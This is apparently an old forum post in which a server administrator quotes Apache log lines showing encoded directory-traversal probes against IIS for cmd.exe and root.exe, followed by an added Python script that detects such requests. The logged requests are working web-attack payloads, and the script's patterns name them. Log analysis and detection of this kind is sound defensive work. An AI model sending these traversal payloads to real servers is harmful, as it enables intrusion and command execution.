
(OT) Some bizarre HTTP requests...



Hello,

While going through the Apache logs this morning, I noticed something
rather strange.

grep -c "Feb/2002" access.log gives 3482 results.

Judge the requests for yourself:


80.11.49.96 - - [06/Feb/2002:14:45:39 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:40 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:44 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:45 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:48 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:49 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:53 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:54 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
80.11.49.96 - - [06/Feb/2002:14:45:55 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"

Are there some little smart alecks out there, or are these machines
infected by something?
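
A triage script for request lines like the ones quoted above, added here as an example and not part of the original post: it flags targets that still hold a percent-escape after one round of decoding, malformed escapes, the bytes 0xC0/0xC1 (never valid in UTF-8), and requests for cmd.exe or root.exe, then counts flagged hits per client. The sample lines are constructed from the patterns in the post; the client addresses, function names and reason labels are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample (Apache combined format), modelled on the quoted requests.
# Client addresses are from the documentation range, not from the post.
SAMPLE = '''\
192.0.2.10 - - [06/Feb/2002:14:45:39 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276 "-" "-"
192.0.2.10 - - [06/Feb/2002:14:45:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
192.0.2.10 - - [06/Feb/2002:14:45:53 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
192.0.2.10 - - [06/Feb/2002:14:45:54 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 "-" "-"
192.0.2.77 - - [06/Feb/2002:14:50:02 +0100] "GET /index.html HTTP/1.0" 200 1043 "-" "-"
'''

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(target):
    """Return the reasons a request target looks like an encoded traversal probe."""
    reasons = set()
    path = target.split('?', 1)[0]
    once = unquote_to_bytes(path)            # exactly one round of percent-decoding
    if re.search(rb'%[0-9a-fA-F]{2}', once):
        reasons.add('double-encoded')        # e.g. %255c decodes to %5c
    if re.search(r'%(?![0-9a-fA-F]{2})', path):
        reasons.add('malformed-escape')      # e.g. %%35c
    if b'\xc0' in once or b'\xc1' in once:
        reasons.add('invalid-utf8')          # 0xC0/0xC1 only occur in overlong forms
    if re.search(rb'(cmd|root)\.exe$', once, re.I):
        reasons.add('shell-binary')
    return reasons

def summarize(log_text):
    """Map client address -> flagged hit count and the sorted reasons seen."""
    report = defaultdict(lambda: {'hits': 0, 'reasons': set()})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, _method, target, _status = m.groups()
        reasons = classify(target)
        if reasons:
            report[client]['hits'] += 1
            report[client]['reasons'] |= reasons
    return {c: {'hits': r['hits'], 'reasons': sorted(r['reasons'])}
            for c, r in report.items()}

if __name__ == '__main__':
    print(summarize(SAMPLE))
```

Many flagged hits from one client within seconds, all answered with 404 or 400, indicate an automated sweep that found nothing to execute on this server.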



